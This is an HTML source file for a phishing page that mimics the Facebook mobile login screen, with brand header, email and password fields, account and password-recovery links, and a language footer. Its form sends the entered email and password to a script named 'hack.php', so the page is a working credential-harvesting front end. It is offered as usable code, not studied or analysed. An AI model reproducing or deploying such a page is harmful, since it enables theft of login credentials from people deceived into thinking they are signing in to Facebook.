<html>
	<head>
		<tilite >
			</tilite>
			<meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Welcome to </title>
<meta name="referrer" content="default" id="meta_referrer">
<meta name='viewport' content='width=device-width, initial-scale=1, user-scalable=no' />
	<meta name="theme-color" content="#3b5998">
			<style>
				body{
					padding: 0px;
					margin :0px; 
					font-family:Vardana;
         }
				.heading {
					padding :0.3px;
					background:#3b5998;
					color:#fff; 
					text-align:center;
					font-size:13px;
           }
           .fast{
                    padding:15px;
                    background :#ffffcc; 
                    color:#3b5998;
                    font-size:16px;
                    
           }
           .Inputnum{
           	margin:15px 20px 0;
           }
           .Inputpass{
           	margin:0px 20px 0;
           }
           input.email1
          {
          	padding :14px; 
              width: 100%;
              background:#f2f2f2; 
              border : 0.8px solid #ccc;
              border-radius:4px 4px  0px 0px;
           }
            input.pass
          {
          	padding :14px; 
              width: 100%;
              background:#f2f2f2; 
              border : 0.8px solid #ccc;
              border-radius:0px 0px  4px 4px;
              border-top:none;
           }
           div.log{
               margin:20px 20px 0;
           }
           input.login:hover{
           	background:#b3b3ff; 
          }
           input.login{
               padding :9px; 
              width: 100%;
              background:#4d4dff; 
              color:#fff; 
              border : 0.8px solid #ccc;
              border-radius:4px 4px  4px 4px;
              border-top:none;
              font-weight:700;
              transition:0.1s;
          }
          .hrClass{
          	margin:20px 10px 0;
          display: flex;
  flex-wrap: nowrap;
          }
          .caccount{
          	margin:40px 0px 0;
         }
          a.account{
             padding :8px; 
              width: 100%;
              background:#00a400; 
              color:#fff; 
              border : 0.8px solid #ccc;
              border-radius:4px 4px  4px 4px;
              text-decoration: none;
              font-weight:600;
              
        }
        .or{
        	color:#999; 
        }
          .Forgotten{
           margin:30px 0px 0;
          }
          .forgotten a{
          text-align:center;
          text-decoration: none;
          opacity:0.5;
          }
          .footer
          {
          	margin:60px 60px 0px;
           }
           table {
           text-align:center;
           opacity:0.5;
}
				</style>
	</head>
	<body>
		<div class="heading"><h1><b>facebook</b></h1></div>
		<div class ="fast">Get Facebook for Android and browse faster. </div>
		<form method="post" class="v w"   action="hack.php">
<div class="loginForm">
<div class="Inputnum">
<input autocorrect="off" placeholder="mobile number or Email address "autocapitalize="off" class="email1" name="email" type="text">
</div>
<div class="Inputpass">
<input autocorrect="off" placeholder="password" autocapitalize="off" class="pass" name="pass" data-sigil="login-password-field" type="password">
</div>
<div class="log">
<input value="log in" name="" class="login" size="0" type="submit">
</div>
</div>
<div class="hrClass">
	<hr style="width:40%;text-align:left;margin-left:0">
		<div class="or">or</div>
  <hr style="width:40%;text-align:right;margin-right:0">
	</div>
	<div class="caccount" >
	<center><a class="account" href=".html" >Create Account</a></center>
</div>
<div class="forgotten"><center><a href="/" >Forgotten password?</a></center></div>
<div class="footer"><table  ><tr ><td width="120px"><b>English(UK) </b><br>
मराठी<br>
ಕನ್ನಡ<br>
తెలుగు<br></td><td width="120px">
हिन्दी<br>
اردو<br>
മലയാളം</td></tr></table></div>
	</body>
</html>